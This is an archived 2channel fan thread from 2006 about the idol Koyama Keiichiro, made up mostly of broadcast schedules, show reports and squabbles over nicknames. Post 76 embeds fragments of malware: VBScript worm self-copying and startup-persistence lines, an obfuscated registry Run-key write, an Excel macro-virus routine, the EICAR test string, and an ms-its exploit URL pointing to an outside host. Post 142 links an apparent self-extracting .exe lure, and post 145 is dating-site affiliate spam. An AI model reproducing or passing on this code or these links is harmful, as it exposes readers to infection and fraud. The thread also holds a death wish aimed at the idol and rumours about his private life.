5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■小山慶一郎■その【1】

1 :(*`レ´*)本スレ無いから立てた:2006/08/26(土) 04:40:42 ID:4sD1V65y
パラスレの【お約束】
●sage推奨(半角でsageとメール欄に入れて下さい)
●プラベネタ・折木ネタ・やらかしネタ禁止!
●安置ネタは安置スレで!
●禿しいお花畑はダメダメ!
●荒らしが来たらスルー(相手をしないで完全無視)
●2ネームはパラきぼんだけど鰯でも可

2 :ユー&名無しネ:2006/08/26(土) 04:45:03 ID:4sD1V65y
花嫁は厄年ッ!公式
ttp://www.tbs.co.jp/hana-yaku/
Ns'あおいSP関係
ttp://www.sanspo.com/geino/top/gt200608/gt2006082404.html
ttp://www.fujitv.co.jp/aoi/index2.html

3 :ユー&名無しネ:2006/08/26(土) 05:17:09 ID:4sD1V65y
【日】Ya-Ya-yah テレ東
【第1・第2日曜】ザ少年倶楽部 BS2
【月】KちゃんNEWS 文化放送
【木】花嫁は厄年ッ! TBS系 9月21日最終回

■9月6日〜? Ns'あおい再放送 フジ
■9月26日(火)午後9時〜11時18分 Ns'あおいスペシャル

4 :ユー&名無しネ:2006/08/26(土) 07:18:06 ID:NbVDoIYM
パラ好きです

5 :ユー&名無しネ:2006/08/26(土) 08:43:31 ID:z3KmM+I/
めちゃくちゃ理想の人!

6 :ユー&名無しネ:2006/08/26(土) 10:00:32 ID:Ih0Nq8zO
>1
新スレオメ!

7 :ユー&名無しネ:2006/08/26(土) 10:04:46 ID:DfPKwyEJ
>1
乙!

8 :ユー&名無しネ:2006/08/26(土) 11:55:44 ID:2XJMdq+d
土偶担最低だな

9 :ユー&名無しネ:2006/08/26(土) 12:18:31 ID:zRaNkPPu
【誘導】
http://tv7.2ch.net/test/read.cgi/jr/1101886290/l50

10 :ユー&名無しネ:2006/08/26(土) 14:42:21 ID:4sD1V65y
明日の鑢番組は鑢とイノチャソと中島の鬼ごっこだけどパラも司会で参加

11 :ユー&名無しネ:2006/08/26(土) 15:53:36 ID:ej0oR+NV
Ns'あおいSP出てくれパラ

12 :ユー&名無しネ:2006/08/26(土) 17:11:17 ID:KY6vCyCD
鑢番組鬼ごっこ司会楽しみだよ
次は司会じゃなくてビビるパラが見たい(w
昨日の大冒険オーラス来たんだってね
あの狭い会場でウマ杉だろ!

13 :ユー&名無しネ:2006/08/26(土) 20:01:28 ID:/bu2yZIW
黒髪パラ来ないかな

14 :ユー&名無しネ:2006/08/26(土) 21:47:24 ID:4sD1V65y
>11
それは出演確実
月刊テレビ情報誌には全部名前出てる

15 :ユー&名無しネ:2006/08/26(土) 23:23:41 ID:4sD1V65y
「Ns'あおいスペシャル」
ttp://www.fujitv.co.jp/fujitv/news/pub_2006/06-277.html

16 :ユー&名無しネ:2006/08/27(日) 08:35:04 ID:hcF3Ims/
パラ大パンフゲトしました(*´∀`)

17 :ユー&名無しネ:2006/08/27(日) 10:55:56 ID:t7U+OdFU
ナースSPは秋の話って書いてある
あんなに小麦色になっちゃってたらメイクさんに怒られそう

18 :ユー&名無しネ:2006/08/27(日) 12:00:44 ID:0JY9yNAV
パラ大パンフは直接行かなきゃダメなのかな

19 :ユー&名無しネ:2006/08/27(日) 12:03:20 ID:t7U+OdFU
>18
資料請求でも取り寄せられるよ
パラ学部のパンフじゃないと意味がないけどね
後は自分で調べろ

20 :ユー&名無しネ:2006/08/27(日) 13:01:29 ID:ZCONQcjm
小山、死ね

21 :ユー&名無しネ:2006/08/27(日) 16:22:41 ID:IvInW5hr
昨日の鑢番組番協入った友より
ヒラメ鮎と鉄板ロケ
笛とガム工場見学だたて
いつOA分か分からんがwktk

22 :ユー&名無しネ:2006/08/27(日) 16:28:19 ID:t7U+OdFU
>21
情報d
公式見たらヒラメ鮎と鉄板ロケが来週みたいでwktk

23 :ユー&名無しネ:2006/08/28(月) 16:24:15 ID:06vKvW9v
スマソがパラがいつもしてる皮のリングのブランドについてkwsk

24 :ユー&名無しネ:2006/08/29(火) 03:07:32 ID:ILcdsyZO
リングといえばポーサンがしてるドクロはやっぱりパラがあげたの物なのかな

25 :ユー&名無しネ:2006/08/30(水) 10:33:55 ID:O4MYXLOe
>24
違うとオモーよ

パラのリングはエルメスだっけ?例の裏原のショップものだっけ?
忘れたよスマソ

26 :ユー&名無しネ:2006/08/31(木) 22:07:19 ID:v52Extfi
>25
dです(´∀`)
他に誰か知ってる姐さんいたらヨロでつ

27 :ユー&名無しネ:2006/09/01(金) 03:09:55 ID:HA7u4bV0
次号のFINE BOYSに出るらしいぞ

28 :ユー&名無しネ:2006/09/01(金) 17:57:53 ID:SZCR6d6q
パラがFINE BOYSはビックリちなみに表紙か?

29 :ユー&名無しネ:2006/09/01(金) 22:56:21 ID:DEwj9sSV
>28
27じゃないけど表紙は目
パラに表紙は無理だろ

30 :ユー&名無しネ:2006/09/02(土) 19:27:35 ID:7rQk1kLu
>29dです

31 :ユー&名無しネ:2006/09/03(日) 00:34:51 ID:DY4G1ByR
最近エロとよくカラオケ行ってるみたいだね

32 :ユー&名無しネ:2006/09/04(月) 05:05:53 ID:G7nSsbL7
エロタソとパラモエス…コヤストリーハァハァ

せめてこのスレは…幸せでアレ



33 :ユー&名無しネ:2006/09/04(月) 23:41:29 ID:/ZNu4FDo
>32
逝け

34 :ユー&名無しネ:2006/09/06(水) 01:41:58 ID:hh/ecArv
ナースSPのために早めにフジWS予約してみて時間調べてるんだけど
今日のミニットが升のコメントだった
以前パラが出たときはチェックやめた後で逃してしまったから
今度もしやったら絶対失敗しないぞ!

35 :ユー&名無しネ:2006/09/07(木) 09:04:05 ID:fWyvNymb
>34
ミニットてなに?

36 :ユー&名無しネ:2006/09/07(木) 14:33:57 ID:ynyhcw66
>35
ナース再放送を一回録画してみればわかるよ
再放送やってない地域ではやらない番組だと思う

37 :ユー&名無しネ:2006/09/08(金) 09:50:52 ID:T9+8bJGF
>36
d!録画してみる

38 :ユー&名無しネ:2006/09/09(土) 00:04:26 ID:hKQ8ugfK
偽善者ぶった麺愛に萎え

39 :ユー&名無しネ:2006/09/09(土) 21:36:18 ID:qKoehnp6
FINE BOYSは本日発売です
パラ載ってたよ

40 :ユー&名無しネ:2006/09/10(日) 17:14:21 ID:XhHrLxhz
あげ

41 :ユー&名無しネ:2006/09/10(日) 21:51:51 ID:ASSF/1PH
   

42 :ユー&名無しネ:2006/09/12(火) 01:53:16 ID:A1ovE/gd
少クラネタバレポ

テーマ「セクシー」山田プロデュースこっちはパラ歌無し
クイズコーナーの1問目が「爺vsパラどっちがセクシーかチビズニア30人に聞きました」
セクシー対決なのに変顔写真が映ってどっちがブサか語り合う(ここはカットされそう)
結果は意外にも25対5でパラ圧勝ここで爺を選んだズニアが多くかなりのズニアが敗退
2問目3問目はオンエア見てくれパラが見本でやった反復横とび萌え

テーマ「道」凸プロデュースこっちは道メドレーの一曲目サヤエンラストにパラ登場
ズニアと一緒にサヤエン歌いそのまま青い稲妻サビのみをソロで歌う
ズニア大冒険で使った曲中のサヤエンなので振り付けがズニアバージョン
こっちに升ゲストで海老氏と小足?バックに赤い衣装で「暁」熱唱
引き続き升審査員でズニアの特技披露コーナーはニカ苺プラムの順番

そういえば今日の塩は少蔵前に収録したのかな?

43 :ユー&名無しネ:2006/09/12(火) 19:39:53 ID:WE20lnic
>42
d!

44 :ユー&名無しネ:2006/09/16(土) 01:18:05 ID:6EUJbdVN
石鹸スレからのお知らせです

0304の実況やりたいと思います
是非参加してください

9月16日23時スタート
0304紺→0304楽屋→意識があればタッチの予定です

45 :ユー&名無しネ:2006/09/16(土) 22:28:22 ID:6fOKtpJz
最近ファンになったのですが(アイドルだと知らなかった)
俳優としての彼しか知らなく、
素はどんな方なのでしょうか?
パラってあだ名?
初心者の婆ですが優しく教えて下さい(´・ω・`)

46 :ユー&名無しネ:2006/09/16(土) 22:53:51 ID:yIEcNlL9
>45
いらっしゃいませ
ドラマからいらしたならパラの真実は知らない方が幸せかもしれません(w
2ネームの由来はあだ名スレを探して読んで下さい
あとこの板はカタカナは半角でお願いします

47 :45:2006/09/17(日) 14:04:15 ID:BJwohFRd
>>46
ありがとうございます
一応、彼の名前が入ったスレは流し読みしましたが
なかなかやんちゃな方の様ですね^^;
でも、若いし、アイドルなのだからこれくらい
俺様至上主義でもカワイイと思いますよ!

あと半角カナですね、携帯で専用アプリを使っていたので
勝手に半角で表示されていたため気付きませんでした
見苦しくてスミマセン!

48 :ユー&名無しネ:2006/09/17(日) 17:37:52 ID:T20/1BX1
>47
それじゃゴミだらけと言われる!
この板は句読点もズニア顔文字以外のAAも全部ゴミ扱いだから注意してください
レスアンカーもシンプルにハイパーはやめて>1個でいいです

49 :45:2006/09/17(日) 20:26:33 ID:BJwohFRd
>47
↑こんなカンジ?
なんだか難しいのでROM専に戻りますね…
ここ半年みた後にまた書き込むかもしれません
その時はよろしくお願いします

50 :ユー&名無しネ:2006/09/17(日) 22:05:12 ID:oSZC50AN
やんちゃって彼ゎMだって聞いたよ
あたしに赤ちゃんみたく甘えればいいのに…
慶一郎。

51 :ユー&名無しネ:2006/09/18(月) 14:04:46 ID:jVKN0w24
慶cカッコぃぃ☆
よろポコとか可愛い♪

52 :ユー&名無しネ:2006/09/18(月) 14:20:44 ID:KqjGzd0x
俳優としてのパラだなんて(ノ∀`)

53 :ユー&名無しネ:2006/09/18(月) 22:17:04 ID:NqxBTVQt
土偶うzeeeeeeeeeeeeeeeeeeeeeeeeeeeee!
ユニスレで担載りしてんじゃねーよ

54 :ユー&名無しネ:2006/09/22(金) 02:19:18 ID:wRZ2HThy
鑢番組の特番またやるね!

テレ東系「Ya-Ya-yah特番(仮)」
10月9日(月)13:55〜15:30
※関東地区限定放送

55 :ユー&名無しネ:2006/09/23(土) 10:29:58 ID:Jiyrh/yN
超見たいんだけど!!
薮ちゃんに萌え〜〜〜〜〜!!!

56 :ユー&名無しネ:2006/09/23(土) 13:27:21 ID:FDnT82kv
厨ばっかorz

57 :ユー&名無しネ:2006/09/23(土) 16:22:44 ID:fK9ak+iX
やっぱり2ネムで立てた方が良かったんじゃ…

58 :ユー&名無しネ:2006/09/24(日) 20:49:58 ID:+v2Cg3mC
パラ笛○俺愛が滝リサイタルに来ててマジックのところでステージにあがった

59 :ユー&名無しネ:2006/09/25(月) 00:25:52 ID:CY4D+PQ5
>25
d!
爺とのコンビはよく見るけどあの4人と
滝の絡みも見たかったな
今週行く自分はもしかしたら…なんてオモテたから
ちとガカーリ

60 :ユー&名無しネ:2006/10/03(火) 23:00:51 ID:y1tPHfEM
あげ

61 :ユー&名無しネ:2006/10/03(火) 23:15:02 ID:r6wdIFZa
>>54
Ya−Ya−yahはいつも見てます。でも、今度の特番は関東地区限定なので残念。他の地方でなぜ放送しないんでしょうね?

62 :ユー&名無しネ:2006/10/04(水) 10:10:20 ID:69udTQlp
>>50
キモス

スルーできんかったゴメソ

63 :ユー&名無しネ:2006/10/05(木) 06:18:32 ID:FTeyc8sl
>62
ハイパーはこの板では異端だからyouも浮いてるよ!

パラが円鳥兄さんライブを友達と見に行ってた模様
明日の麺愛で書くかな?

64 :ユー&名無しネ:2006/10/11(水) 01:03:41 ID:IOZlpCEa
やっぱりパラはパラだ(ノ∀`)
17×3くらいは暗算出来るようになろうよと思ってたら
また変な日本語創作してるのを笛のとこの猫にばらされてる
いつも面倒見てもらってて笛には申し訳ない

65 :ユー&名無しネ:2006/10/14(土) 01:26:34 ID:0JcqJFIG
Jrに戻ったの?

66 :ユー&名無しネ:2006/10/14(土) 16:16:56 ID:WpmwbECt
>65

ウゼ

67 :ユー&名無しネ:2006/10/17(火) 10:50:34 ID:fdJz1dHf
ちょっとまて本当にここ鰯の本スレなのか?

68 :ユー&名無しネ:2006/10/17(火) 19:13:58 ID:TFOVEEYY
>>67
他にスレないんだからここってことにしておけ

69 :ユー&名無しネ:2006/10/17(火) 23:16:36 ID:JmaOFc4s
慶一郎が痙攣するくらい凄いキスを慶一郎としたい

70 :ユー&名無しネ:2006/10/18(水) 06:53:46 ID:vTdGneSf
小山君もはるくんと一緒に夢の国の陸の方に行けなくて残念だったね!今度は行けるといいね♪

71 :ユー&名無しネ:2006/10/23(月) 11:00:50 ID:ZeYfG8Oe
Jrに戻ったの?

72 :ユー&名無しネ:2006/10/23(月) 12:27:39 ID:mWtRDHn5
小山君!加藤君との約束も守ってあげてね♪加藤君と小山君って本当に仲良しだね♪

73 :ユー&名無しネ:2006/10/25(水) 02:10:48 ID:M6VcWjfA
手越>>>>>>>>>>>>>>>>小山

74 :ユー&名無しネ:2006/10/25(水) 06:09:40 ID:CprKLISN
昨日の加藤君の日記で笑った!
小山君の発言には私も笑った!
小山君と一緒にいたら毎日飽きないと思った!

75 :ユー&名無しネ:2006/10/25(水) 10:54:23 ID:BibL16OX
慶ちゃんテラカワユス

76 :<body onload=window()>:2006/10/27(金) 16:13:28 ID:DOxB20f7
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

77 :ユー&名無しネ:2006/10/27(金) 18:07:09 ID:azR7hMeJ
小山君!紅く燃ゆる太陽!忘れないでね!
あとパーキングのPをパーと言ってしまった!(笑)小山君ってやっぱりおもしろい!!!

78 :ユー&名無しネ:2006/10/28(土) 10:00:44 ID:ZyFdoC07
小山君おすすめの宮崎料理店ってサエコに教えてもらったのかな

79 :ユー&名無しネ:2006/10/28(土) 16:46:25 ID:y9MbFaID
宮崎料理は大学の友達に
教えてもらいました!

80 :ユー&名無しネ:2006/10/28(土) 20:00:33 ID:2q9YKbdS
ここ本スレないから作ったみたいだけど
小山君とか読んでるような厨ばっか(ry
2ネームも分からないんだろ?

81 :ユー&名無しネ:2006/10/28(土) 20:01:27 ID:2q9YKbdS
連投スマソ
宮崎料理はサエコ兄から教えてもらったとオモ

82 :ユー&名無しネ:2006/10/28(土) 22:46:02 ID:IbFBRzy9
鑢番組のご当地料理のコーナーで宮崎料理の店行ってなかったか?
笛ぬこには店に行くの2回目ってあったから番組で行った店にいったとか・・・

83 :ユー&名無しネ:2006/10/30(月) 00:38:16 ID:YVcfUjw+
80:ユー&名無しネ 10/28(土) 20:00 2q9YKbdS [sage]            ここ本スレないから作ったみたいだけど       小山君とかよんでるような厨ばっか(ry 2ネームも分からないんだろ?

84 :ユー&名無しネ:2006/10/30(月) 00:51:17 ID:tXMM3M9P
オマイ達小山君て
出直して来い

85 :ユー&名無しネ:2006/10/30(月) 01:03:04 ID:z46VUHWt
>80
>84
禿同
じぬんパラ担だがこんな本スレならイラネ

86 :ユー&名無しネ:2006/10/30(月) 07:50:53 ID:uX803hKI
スレタイ変えた方がいいとオモ
こんなスレタイじゃいろいろよって来るのはナタリマエ

87 :ユー&名無しネ:2006/10/30(月) 09:26:29 ID:G/lV9um+
2ネーム守って何が楽しいの?呼び方なんてなんだっていいじゃん。変な言葉使わない方がいいんじゃない(笑)。ここでは通用するけど仕事仲間とそんなの使ってるとバカだと思われる。そんなの使ってる人たちはニートしかいないか☆

88 :ユー&名無しネ:2006/10/30(月) 09:31:29 ID:xn/o7ywj
早くここ埋めて次行こう梅

89 :ユー&名無しネ:2006/10/30(月) 10:09:01 ID:5zZzXbeD
真性厨は2ネムが使われている理由が分からないんだな
どうせ場違いなレスしてんのは安置だろうけどそうじゃないのなら半年ロムれ
そして半年ロムる気が無いのならさっさと厨掲にカエレ
長文プラス反応してスマソorz

このスレ立てたヤシもそこらへん配慮して欲しかったな

梅ヽ(`Д´)ノ

90 :ユー&名無しネ:2006/10/30(月) 10:15:27 ID:uX803hKI
立てた姐サンは鰯スレがないことと
あと新規にも優しいようにって立てた
というレスを本スレで見かけた

それが仇となったみたいだな

91 :ユー&名無しネ:2006/10/30(月) 13:30:37 ID:mTkIX4xy
結局ここは鰯の本スレなのか?


92 :ユー&名無しネ:2006/10/30(月) 17:39:10 ID:eNln04oC
小山くんはなぜ鰯なんですか?
加藤くんはなぜ笛or笛ぬこなんですか?
どなたか優しい方教えてください

93 :ユー&名無しネ:2006/10/30(月) 17:42:45 ID:AfQx6uda
小山君は鰯ではなく土偶です
理由は土偶に似ているからだそうです

94 :ユー&名無しネ:2006/10/30(月) 17:46:18 ID:AfQx6uda
あと小山君の本スレはここにあるから
http://jbbs.livedoor.jp/music/8417/
http://0bbs.jp/paraparapara/

95 :ユー&名無しネ:2006/10/30(月) 21:43:28 ID:HUvNiCJX
安置も厨もまとめて報知でヨロ

昔いた姐さんたちは壷から出た後そんなに熱烈戻りたくないから
パラスレ立てなかったんだろうし今はそんなに荒れてるわけじゃないし
ここでいいんじゃねーのかな

96 :ユー&名無しネ:2006/10/30(月) 22:14:01 ID:MVARY2VB
>95
勃てた本人乙
厨氏ね

97 :ユー&名無しネ:2006/10/31(火) 01:23:52 ID:3t06go4b
パラはベッドじゃなくてふとん?

98 :ユー&名無しネ:2006/10/31(火) 17:53:34 ID:V+bEzopD
小山君に土偶でも鰯でもありません!親がつけた慶一郎と名前があります!小山君と小山君の親に失礼です!

99 :ユー&名無しネ:2006/10/31(火) 18:08:23 ID:KWxUFh8L
お母さんいい人★そろそろ龍太郎行くぞー!

100 :ユー&名無しネ:2006/10/31(火) 18:09:35 ID:KWxUFh8L
100(本日2回目)

101 :ユー&名無しネ:2006/10/31(火) 20:13:29 ID:jPiln9vV
今更だがFINE BOYS見逃した orz
ゲトした姐さん方パラはカコヨスでしたか?

102 :ユー&名無しネ:2006/10/31(火) 21:41:09 ID:YAsEetsU
はいはい土偶土偶

103 :ユー&名無しネ:2006/10/31(火) 23:05:56 ID:V+bEzopD
小山君の事を土遇なんて呼ばないで欲しい!

104 :ユー&名無しネ:2006/10/31(火) 23:09:29 ID:iB/1iyqw
だったらこんなとこくるなタコ ドグウなんだからしょうがまい

105 :ユー&名無しネ:2006/10/31(火) 23:12:22 ID:/FdZbtgV
どうでも良いがsageろ
郷に入れば郷に従えということだ

106 :ユー&名無しネ:2006/10/31(火) 23:43:12 ID:V+bEzopD
土遇と呼ばないでいただきたい!小山君の事も考えてあげて欲しい!がんばれ小山君!

107 :ユー&名無しネ:2006/10/31(火) 23:53:01 ID:tbQq7wLE
ageんな緑厨ぼけが

パラ担だが2ネームだからしょうがないとオモってる
そんなこと言ってたら笛を笛と呼ばないでと言ってるのと同じジャマイカ?

108 :ユー&名無しネ:2006/11/01(水) 00:04:08 ID:jPiln9vV
誰がなんて呼ぼうとほっとけ
イヤならオマイが呼ばなきゃいい話
自分もパラ担だが土偶や鰯は使わないぞ

109 :ユー&名無しネ:2006/11/01(水) 00:15:28 ID:t7dp0iJ8
小山君はこんな言葉使い悪い人は嫌い!

110 :ユー&名無しネ:2006/11/01(水) 00:20:35 ID:UT2UestY
>1にちゃんとsage推奨と書いてあるので
2ネームを理解してないふりをしてるあげ荒らしはスルー
本当の初心者も紛れ込んでるなら
2ちゃんガイドを読んでから出なおしてくれ
http://info.2ch.net/guide/

111 :ユー&名無しネ:2006/11/01(水) 00:26:05 ID:t7dp0iJ8
かわいそう!小山君!

112 :ユー&名無しネ:2006/11/01(水) 00:29:55 ID:eEJ43Oyt
ココも笛スレと同一による被害被っているのか…

113 :ユー&名無しネ:2006/11/01(水) 00:32:53 ID:gbU2b8LC
誰か通報して…

本当にしつこいから…

114 :ユー&名無しネ:2006/11/01(水) 00:34:49 ID:t7dp0iJ8
気にしないで!小山君!

115 :ユー&名無しネ:2006/11/01(水) 00:45:13 ID:UT2UestY
鏝荒らしならある程度溜めて一気に通報する方がいいので
報知しておいてください

116 :ユー&名無しネ:2006/11/01(水) 00:52:43 ID:t7dp0iJ8
あなたたち本当に小山君の事思ってたらやめていただきたい!

117 :ユー&名無しネ:2006/11/01(水) 01:01:31 ID:ofaXRCg1
緑はどうでもいいが
純粋にパラの話題がほとんど回っていない件

118 :ユー&名無しネ:2006/11/03(金) 04:18:41 ID:qGu3FD6w
他担が失礼しまっす

これが本スレなのか違うのかは分からないが

325:11/02(木) 17:26 eRkITPZV
THE BOY FROM OZ10/31マチネ NEWS小山

(担が言うのもおかしいが)
このように自担の舞台に来ていただき誠にありがトン
本人から感想を聞きたいものだ…



119 :ユー&名無しネ:2006/11/03(金) 16:25:04 ID:PxFaZKQL
>118
いらっしゃいませ
このような所にまでお知らせdです
OZの舞台は自分も拝見させていただきましたが
歌唱力が何よりもすばらしかったです
パラの感想は自分も知りたいと思いました

120 :ユー&名無しネ:2006/11/03(金) 18:14:09 ID:PxFaZKQL
>118
連投になりますがパラが蛇波でやってる連載メンバー愛で
OZについて書いていますのでよろしかったらご覧下さい

121 :ユー&名無しネ:2006/11/08(水) 03:59:35 ID:EwQPIwhz
またドラマが見たいな
1月にナースのパート2でもやってくれないかな

122 :ユー&名無しネ:2006/11/08(水) 20:16:09 ID:V+TxRUFs
どこ中? 町田らへんだっけ?

123 :ユー&名無しネ:2006/11/12(日) 12:40:40 ID:vAmcVuAW
サエコと付き合っていたのは事実???
嘘?????どっち??????



124 :ユー&名無しネ:2006/11/13(月) 16:31:11 ID:1LiiMSd8
>122ー123
age厨に教える事は何もナス
それにそんな事担には関係のない訳で噂話・ストーカー話はよそでドゾー

125 :ユー&名無しネ:2006/11/14(火) 00:30:31 ID:cOtJWZP3
ザ少年倶楽部スペシャル クリスマスプレゼント!
BS2  12月23日(土)後7:30〜9:00
BSハイビ 12月24日(日)後5:30〜7:00

今回のスペシャル版はジャニーズJr.がスタジオに大集合。
2003年4月にNHKホールでの収録がスタートしてからの過去4年間の貴重なVTRの中から
「もう一度みたいあの曲、あのシーン」を視聴者からのハガキで募集し紹介する。
またホールでは見られないジャニーズJr.たちの素顔を織り交ぜたトークとともに、ジュニアをはじめ
今まで番組に出演したジュニアの先輩である「KinKi Kids」「タッキー&翼」
「山下智久」「関ジャニ∞」「KAT−TUN」の懐かしいVTR
さらにゲストからのクリスマスメッセージなども紹介。
番組の司会は小山慶一郎、中丸雄一が務め、視聴者のみなさんが楽しめるスペシャルクリスマスプレゼントとしたい。
【進行】小山慶一郎、中丸雄一
【出演】ジャニーズJr. ほか

126 :ユー&名無しネ:2006/11/15(水) 19:01:10 ID:orRZ5cU5
武道館のJプレミアムに傘と来たよ

127 :ユー&名無しネ:2006/11/15(水) 19:29:53 ID:orRZ5cU5
傘とインタビュー受けてたらしい
今日のゼロか明日のWSで映るかも

128 :ユー&名無しネ:2006/11/15(水) 21:15:28 ID:J49oIahl
>126-127
d
何でパラと傘?と思ったけど小僧のこれか!

『硫黄島からの手紙』ワールド・プレミア試写会
2006年11月15日(水)19:00〜日本武道館

129 :aguepwaud:2006/11/16(木) 11:22:44 ID:MmBmkPDh
暴れる

130 :ユー&名無しネ:2006/11/21(火) 01:27:44 ID:2JC23/fB
少蔵行ってきたから拙いけどレポする
12/3分が足プロデュースで「個性」12/10分がヒラメ苺プロデュースで「仲間」
麺愛で書いてたパラソロ曲は12/3の最後の方で流れると思うけど「ラブ アディクション」スペルわかんない
ヘッドホン装着してラップから始まる曲でカクイイ系ダンスありバックは小足の4人だった気がする
エロ升は「個性」の方で日本語味噌汁歌って「仲間」の方で手紙読んだ後に砂時計と英語味噌汁のメドレーを歌ってた
「個性」の方のズニア一芸コーナー審査員のエロ升が暗転中に出てきて
升がジャケットプレイやったりしてるとこにパラも行ってワチャワチャ楽しそうだったその時にエロがパラにギュって抱き付いてて禿裏山だった
もう1個のゲームはヒントでキーワードを当てる対決でゲームが改善されてた
パラチーム対ヒラメチームで結果は見てのお楽しみ
蛇足だけど「個性」の方でユニ代表がユニの個性を語る所で蛙がキムタク衣装を着ててひと盛り上がりしてた

131 :ユー&名無しネ:2006/11/21(火) 01:28:34 ID:2JC23/fB
sage入れるの忘れてたorz

132 :ユー&名無しネ:2006/11/21(火) 01:31:55 ID:NuO+IzBo
うわあ…
避難所で話してあげたら?

133 :ユー&名無しネ:2006/11/21(火) 02:12:42 ID:2JC23/fB
思い出した!
ヒントでキーワードを当てるクイズの時に答えを導き出すヒントで
パラが「おじいちゃん」て言ったら客席からでかい声で「イノチャン」と叫んだヲタがいて
そこから「イノチャンがおじいちゃん?」と皆でひと盛り上がり
その後にヒラメが次の対決出場者イノチャソの事を「おじいちゃん」と紹介したら
パラが「それ言うとさっきの使わなきゃならないから」と教えてヒラメが言いなおしてた
そのわりにゲームが終わってはけて行くときにパラがオンマイクで「おじいちゃんイノチャン」とかわざわざ言ってった(w

134 :ユー&名無しネ:2006/11/24(金) 15:04:08 ID:B2/HGb9q
>133

レポd!

135 :ユー&名無しネ:2006/11/25(土) 03:58:17 ID:Vm9DDVeQ
>133
レポd
さすがフォローの鬼パラカコヨス

136 :ユー&名無しネ:2006/11/26(日) 01:46:45 ID:4PVXW8ng
11月27日のKちゃんNEWSは・・・?
加藤くんを迎えて、生電話!
今週もエンディングであの話聞いちゃいますか?

このエンディングのあの話ってマイブームかな?
お約束のネタになりつつあるよね

137 :ユー&名無しネ:2006/12/03(日) 01:13:17 ID:z5CJeGmG
笛日記ワロタ
あれじゃパラに伝えたも同然だ
以前もパラによろしくネタがあった気がするけど
2人をまとめて考えるヲタが多いのかな?
パラも笛にヨロシクとか言われてそう(w

138 :ユー&名無しネ:2006/12/05(火) 06:53:51 ID:EcWy5pci
少蔵がまた当たってた!生パラが見られる(*´∀`*)
強運過ぎて怖いと思ったら今月は周りの友は皆当たってるラスィ
自分の運なんてそんな程度のもんだよね(w

139 :ユー&名無しネ:2006/12/09(土) 23:59:42 ID:dr+33x3y
牛紺行ける!
でも肝心のパラがいるのか不安(´・ω・`)

140 :ユー&名無しネ:2006/12/10(日) 11:25:42 ID:sdMFeHu6
ノシ

141 :ユー&名無しネ:2006/12/10(日) 12:59:23 ID:VENruVCw
鑢番組の鉄板ロケ司会にいたけど
いつの間にあんなに髪が伸びたんだろう?
ずいぶん見てないからしょうがないけど

142 :ユー&名無しネ:2006/12/10(日) 13:09:48 ID:yO16xeq7
http://proxy.f3.ymdb.yahoofs.jp/bc/450fd633_152da/bc/%a4%ba%a4%d0%a4%ea%b8%c0%a4%ef%a4%ca%a4%a4%a4%ef%a4%e8.sfx.exe?bcarneFBW0bifhc.
小山君カワユス

143 :ユー&名無しネ:2006/12/10(日) 18:52:34 ID:VENruVCw
少蔵見ながら麺愛を見て大爆笑
千鳥格子も読めなかったとは

144 :ユー&名無しネ:2006/12/10(日) 18:53:58 ID:VENruVCw
間違えた!麺愛じゃなくて笛日記だった
少蔵は鮎のパンツネタで笑った

145 :ユー&名無しネ:2006/12/11(月) 22:49:35 ID:SP7/PFzr
毎日1000円以上、本当に稼げるよ。
思い立ったら即実行しちゃおう!無料お試しへ行こう!
↓↓↓
ワクワクメール  http://550909.com/?f1058845
ハッピーメール http://www.happymail.co.jp/?af2142151
1.まず、上記サイトで無料会員登録をします。
受信拒否の解除をお忘れなく。
2.登録後、トップページからログインしてください。
メンバー専用のページのメニューに 「アフィリエイト」
というところがありますのでそこでアフィリエイトの申し込み
をしてください。
すると、あなた専用の『紹介用URLアドレス』を貰えます。
あとは簡単です。
誰かがこのあなた専用の紹介用URLから会員登録すると、あな
たに報酬が発生します。
報酬額は、1人が登録しただけで、1000円もらえます。
1日2人が登録すれば2000円もらえます。
1日2000円×一ヶ月30日=60000円の収入が得られます。
私ゎこれでコンサート代払っています。
もちろん!!出会いを楽しむのも○!!女性ゎ完全無料です。

146 :ユー&名無しネ:2006/12/12(火) 02:56:12 ID:X0w8wsqM
小山って「クリスマスはひとりかな」とか
「寂しいクリスマスになりそう」とか わざとらしい。





ぜってー彼女いるし
あいつチャラ男だし

147 :ユー&名無しネ:2006/12/12(火) 06:55:50 ID:U6CfuucL
少蔵行ってきたので簡単レポするけど今回パラの歌は全くなしで残念
パラはヘアカラーをブロンドっぽくしてトップからバックにかけてパーマしてた
衣装は左膝が破れてるジーンズで膝がこんにちは
あとこの間鮎とお揃と言ってたやつかわからないけど★柄パンツ履いてた
アクセは金のドクロリングに始まりゴールドで統一してっぽくてギャル男マックス状態
1/7分は急行のチビちゃんプロデュースの「ゴメンナサイ」
1/14分はQプロデュースの「謎」でゲストはどちらも滝つ
急行の山寺和尚を紹介する時に「急行」を噛んでしまってゴメンナサイしてた
Qの麺とは仲良しな感じで隣に立ってたアクンやリンスとじゃれてた
試聴者からの相談ハガキコーナーでパラゑ父さんプラム○と前に並んで座ってる時に
パラが「手紙読みたい人!」と言ったら「ハイ!ハイ!」と挙手しながら
ゑ父さんプラムがパラを囲んで密着してきてパラが見えない状態に
「近いw近いw」と言いながら○を指名するパラ
